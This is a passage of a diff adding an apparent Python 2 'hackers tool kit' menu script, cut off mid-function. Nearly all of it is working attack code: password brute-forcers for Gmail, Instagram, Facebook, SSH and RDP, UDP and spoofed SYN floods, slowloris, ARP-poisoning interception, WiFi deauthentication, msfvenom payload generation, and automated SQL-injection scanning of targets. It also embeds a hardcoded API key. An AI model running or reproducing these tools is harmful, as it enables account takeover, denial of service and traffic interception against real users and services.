++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() +def port(): + n = raw_input("Enter Target: ") + os.system("nmap " + n) +def insta(): + insta = raw_input("USERNAME> ") + jl = raw_input("WORDLIST> ") + k = raw_input("THREADS> ") + ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) + os.system(ma) +def fb(): + facebook = raw_input("[EMAIL/ID->]: ") + word = raw_input("[WORDLIST->]: ") + ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +def ipgrab(): + b = raw_input(Y+'Enter Host:\033[0m ') + ip = socket.gethostbyname(b) + print G+"------------------------\033[0m" + print N+"Host: ", b + print N+"IP: ", ip + print G+"------------------------\033[0m" +def myip(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) +def wifite(): + os.system("wifite") +def mon(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +def netdev(): + os.system("netdiscover") +def scannet(): + os.system("iwconfig") + m = raw_input("Select Interface: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) +def info(): + params = [] + # Browser + br = mechanize.Browser() + + # Just some colors and shit + white = '\033[1;97m' + green = '\033[1;32m' + red = '\033[1;31m' + yellow = '\033[1;33m' + end = '\033[1;m' + info = '\033[1;33m[!]\033[1;m' + que = '\033[1;34m[?]\033[1;m' + bad = '\033[1;31m[-]\033[1;m' + good = '\033[1;32m[+]\033[1;m' + run = '\033[1;97m[~]\033[1;m' + + # Cookie Jar + cj = cookielib.LWPCookieJar() + br.set_cookiejar(cj) + + # Browser options + br.set_handle_equiv(True) + br.set_handle_redirect(True) + br.set_handle_referer(True) + br.set_handle_robots(False) + + # Follows refresh 0 but not hangs on refresh > 0 + br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) + br.addheaders = [ + ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] + + + print '''\033[1;31m + _________ __ __ __ + / _____// |________|__| | __ ___________ + \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ + / \| | | | \/ | <\ ___/| | \/ + /_______ /|__| |__| |__|__|_ \\\\___ >__| + \/ \/ \/\033[1;m''' + target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') + if 'http' in target: + parsed_uri = urlparse(target) + domain = '{uri.netloc}'.format(uri=parsed_uri) + else: + domain = target + try: + br.open('http://' + target) + target = 'http://' + target + except: + target = 'https://' + target + + def sqli(url): + print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run + br.open('https://suip.biz/?act=sqlmap') + br.select_form(nr=0) + br.form['url'] = url + req = br.submit() + result = req.read() + match = search(r"---(?s).*---", result) + if match: + print '%s One or more parameters are vulnerable to SQL injection' % good + option = raw_input( + '%s Would you like to see the whole report? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + print '\033[1;31m-\033[1;m' * 40 + print match.group().split('---')[1][:-3] + print '\033[1;31m-\033[1;m' * 40 + else: + print '%s None of parameters is vulnerable to SQL injection' % bad + + + def cms(domain): + try: + result = br.open('https://whatcms.org/?s=' + domain).read() + detect = search(r'class="nowrap" title="[^<]*">', result) + WordPress = False + try: + r = br.open(target + '/robots.txt').read() + if "wp-admin" in str(r): + WordPress = True + except: + pass + if detect: + print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) + detect = detect.group().split('">')[1][:-27] + if 'WordPress' in detect: + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + elif WordPress: + print '%s CMS Detected : WordPress' % info + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + else: + print '%s %s doesn\'t seem to use a CMS' % (info, domain) + except: + pass + + def honeypot(ip_addr): + result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} + honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr + try: + phoney = br.open(honey).read() + if float(phoney) >= 0.0 and float(phoney) <= 0.4: + what = good + else: + what = bad + print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) + except KeyError: + print '\033[1;31m[-]\033[1;m Honeypot prediction failed' + + def whoisIt(url): + who = "" + print '{} Trying to gather whois information for {}'.format(run,url) + try: + who = str(whois.whois(url)).decode() + except Exception: + pass + test = who.lower() + if "whoisguard" in test or "protection" in test or "protected" in test: + print '{} Whois Protection Enabled{}'.format(bad, end) + else: + print '{} Whois information found{}'.format(good, end) + try: + data = json.loads(who) + for key in data.keys(): + print "{} :".format(key.replace("_", " ").title()), + if type(data[key]) == list: + print ", ".join(data[key]) + else: + print "{}".format(data[key]) + except ValueError: + print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) + pass + + def nmap(ip_addr): + port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr + result = br.open(port).read() + result = sub(r'Starting[^<]*\)\.', '', result) + result = sub(r'Service[^<]*seconds', '', result) + result = os.linesep.join([s for s in result.splitlines() if s]) + print result + + def bypass(domain): + post = urlencode({'cfS': domain}) + result = br.open( + 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() + + match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) + if match: + bypass.ip_addr = match.group().split(' ')[1][:-1] + print '%s Real IP Address : %s' % (good, bypass.ip_addr) + + def dnsdump(domain): + res = DNSDumpsterAPI(False).search(domain) + print '\n%s DNS Records' % good + for entry in res['dns_records']['dns']: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + for entry in res['dns_records']['mx']: + print '\n%s MX Records' % good + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n\033[1;32m[+]\033[1;m Host Records (A)' + for entry in res['dns_records']['host']: + if entry['reverse_dns']: + print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) + else: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n%s TXT Records' % good + for entry in res['dns_records']['txt']: + print entry + print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) + + + def fingerprint(ip_addr): + try: + result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() + match = search(r'"os_description": "[^<]*"', result) + if match: + print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) + except: + pass + + + ip_addr = socket.gethostbyname(domain) + print '%s IP Address : %s' % (info, ip_addr) + try: + r = requests.get(target) + header = r.headers['Server'] + if 'cloudflare' in header: + print '%s Cloudflare detected' % bad + bypass(domain) + try: + ip_addr = bypass.ip_addr + except: + pass + else: + print '%s Server: %s' % (info, header) + try: + print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) + except: + pass + try: + r.headers['X-Frame-Options'] + except: + print '%s Clickjacking protection is not in place.' % good + except: + pass + fingerprint(ip_addr) + cms(domain) + try: + honeypot(ip_addr) + except: + pass + print "{}----------------------------------------{}".format(red, end) + whoisIt(domain) + try: + r = br.open(target + '/robots.txt').read() + print '\033[1;31m-\033[1;m' * 40 + print '%s Robots.txt retrieved\n' % good, r + except: + pass + print '\033[1;31m-\033[1;m' * 40 + nmap(ip_addr) + print '\033[1;31m-\033[1;m' * 40 + dnsdump(domain) + os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) + try: + br.open(target) + print '%s Crawling the target for fuzzable URLs' % run + for link in br.links(): + if 'http' in link.url or '=' not in link.url: + pass + else: + url = target + '/' + link.url + params.append(url) + if len(params) == 0: + print '%s No fuzzable URLs found' % bad + quit() + print '%s Found %i fuzzable URLs' % (good, len(params)) + for url in params: + print url + sqli(url) + url = url.replace('=', '') + r = br.open(url).read() + if '' in r: + print '%s One or more parameters are vulnerable to XSS' % good + break + print '%s These are the URLs having parameters:' % good + for url in params: + print url + except: + pass +def sysinfo(): + os.system("ifconfig") + os.system("iwconfig") + os.system("neofetch") + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) +def msfex(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show exploits'""") +def udp(): + target = raw_input(N+"Target:\033[91m ") + ip = socket.gethostbyname(target) + port = input(N+"Port:\033[91m ") + os.system("service tor restart") + print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) + os.system("sleep 2s") + sent = 0 + print "KILLING %s CONNECTIONS"%(ip) + while True: + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) + if port == 65534: + port = 1 +def tcp(): + print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" + print "\n" + tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") + print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" + os.system("sleep 5") + os.system("python /root/hackers-tool-kit/tools/" + tcp) +def syn(): + def randomIP(): + ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) + return ip + + def randInt(): + x = random.randint(1000,9000) + return x + + def SYN_Flood(dstIP,dstPort,counter): + total = 0 + print "Packets are sending ..." + for x in range (0,counter): + s_port = randInt() + s_eq = randInt() + w_indow = randInt() + + IP_Packet = IP () + IP_Packet.src = randomIP() + IP_Packet.dst = dstIP + + TCP_Packet = TCP () + TCP_Packet.sport = s_port + TCP_Packet.dport = dstPort + TCP_Packet.flags = "S" + TCP_Packet.seq = s_eq + TCP_Packet.window = w_indow + + send(IP_Packet/TCP_Packet, verbose=0) + total+=1 + sys.stdout.write("\nTotal packets sent: %i\n" % total) + + + def info(): + + dstIP = raw_input ("\nTarget IP : ") + dstPort = input ("Target Port : ") + + return dstIP,int(dstPort) + + + def main(): + dstIP,dstPort = info() + counter = input ("Packets : ") + SYN_Flood(dstIP,dstPort,int(counter)) + + main() + +def ping(): + p = raw_input("Enter Host: ") + os.system("ping " + p) +def msfpa(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show payloads'""") +def msfau(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show auxiliary'""") +def multih(): + os.system("service postgresql start") + os.system("""msfconsole -x 'use multi/handler'""") +def msfall(): + os.system("service postgresql start") + os.sytem("""msfconsole -x 'show all'""") +def hydra(): + """ + This program is just a small program to shorten brute force sessions on hydra :) + But to be more satisfying results of the brute force. You better interact directly with hydra, + without having to use this black hydra console first: '). + If you find any errors in running our program. Can chat via facebook :). + Hydra is needed for the process of this program :). + """ + import sys, os, time + + # Restart #################### + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() +def cupp(): + os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") + print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" +def vdir(): + print "\n" + os.system("ls") + print Y+"! doesnt have to be these can be any directory !\033[0m" + print "\n" + h = raw_input("Directory Path: ") + print "\n" + print "--------------------------------------------------------------------------------------------------------------------------------------------" + os.system("ls " + h) + print "--------------------------------------------------------------------------------------------------------------------------------------------" + +def monoff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +def vpn(): + os.system("anonsurf start") + os.system("anonsurf myip") +def vpnoff(): + os.system("anonsurf stop") + os.system("anonsurf myip") +def slowl(): + de = raw_input("Delay: ") + tar = raw_input("RHOST: ") + port = raw_input("RPORT: ") + soc = raw_input("Sockets: ") + os.system('echo "use auxiliary/dos/http/slowloris\n" > handler.rc') + os.system('echo "set delay {0}\n" >> handler.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> handler.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> handler.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> handler.rc'.format(soc)) + os.system('echo "run\n" >> handler.rc') + os.system('msfconsole -r handler.rc') + os.system('rm -rf handler.rc') + +def pidox(): + print Y+"! USING FIREFOX !\033[0m" + os.system("sleep 2") + os.system("firefox https://pipl.com/") +def specnet(): + jk = raw_input("BSSID: ") + kj = raw_input("ESSID: ") + os.system("iwconfig") + k = raw_input("INTERFACE: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) + if j == "n": + a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) +def pingen(): + j = raw_input("Enter BSSID: ") + a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) + os.system(a) +def reaver(): + os.system("iwconfig") + j = raw_input("Select Interface: ") + k = raw_input("Enter BSSID: ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) +def deauth(): + print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" + j = raw_input("Enter BSSID> ") + os.system("iwconfig") + k = raw_input("Enter Interface> ") + a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) + os.system(a) +def macc(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +def macoff(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +def arppois(): + + try: + os.system("iwconfig") + interface = raw_input("[*] Enter Interface: ") + victimIP = raw_input("[*] Enter Victim IP: ") + gateIP = raw_input("[*] Enter Router IP: ") + except KeyboardInterrupt: + print "\n[*] User Requested Shutdown" + print "[*] Exiting..." + os.system("clear") + mainbanner() + + print "\n[*] Enabling IP Forwarding...\n" + os.system("echo 1 > /proc/sys/net/ipv4/ip_forward") + + def get_mac(IP): + conf.verb = 0 + ans, unans = srp(Ether(dst = "ff:ff:ff:ff:ff:ff")/ARP(pdst = IP), timeout = 2, iface = interface, inter = 0.1) + for snd,rcv in ans: + return rcv.sprintf(r"%Ether.src%") + + def reARP(): + + print "\n[*] Restoring Targets..." + victimMAC = get_mac(victimIP) + gateMAC = get_mac(gateIP) + send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = victimMAC), count = 7) + send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = gateMAC), count = 7) + print "[*] Disabling IP Forwarding..." + os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") + print "[*] Shutting Down..." + os.system("clear") + mainbanner() + + def trick(gm, vm): + send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst= vm)) + send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst= gm)) + + def mitm(): + try: + victimMAC = get_mac(victimIP) + except Exception: + os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") + print "[!] Couldn't Find Victim MAC Address" + print "[!] Exiting..." + os.system("clear") + mainbanner() + try: + gateMAC = get_mac(gateIP) + except Exception: + os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") + print "[!] Couldn't Find Gateway MAC Address" + print "[!] Exiting..." + os.system("clear") + mainbanner() + print "[*] Poisoning Targets..." + while 1: + try: + trick(gateMAC, victimMAC) + time.sleep(1.5) + except KeyboardInterrupt: + reARP() + break + mitm() +def sslscan(): + j = raw_input('Enter Target: ') + a = 'sslscan {0}'.format(j) + os.system(a) +def payload(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + print "\n" + f = raw_input("Select Payload: ") + l = raw_input("LHOST: ") + c = raw_input("LPORT: ") + os.system("cat /root/hackers-tool-kit/tools/formats.txt") + s = raw_input("Format: ") + h = raw_input("File Name: ") + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -f {3} -o /root/{4}.{5}'.format(f,l,c,s,h,s) + os.system(a) +def crunch(): + print "minimal number of characters" + j = raw_input("[CRUNCH]: ") + print "maximum number of characters" + k = raw_input("[CRUNCH]: ") + print "what characters should be in it" + b = raw_input("[CRUNCH]: ") + print "name of file" + s = raw_input("[CRUNCH]: ") + a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) + os.system(a) + print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +def traff(): + os.system("iwconfig") + s = raw_input("Select Interface: ") + os.system("tcpdump -i " + s) +def resa(): + j = raw_input("USERNAME: ") + k = raw_input("NEW PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'echo "{0}:{1}" | chpasswd'.format(j,k) + print "password for {0} has been reset".format(j) +def resu(): + j = raw_input("PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'passwd {0}'.format(j) + print "unix password has been reset".format(j) +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # 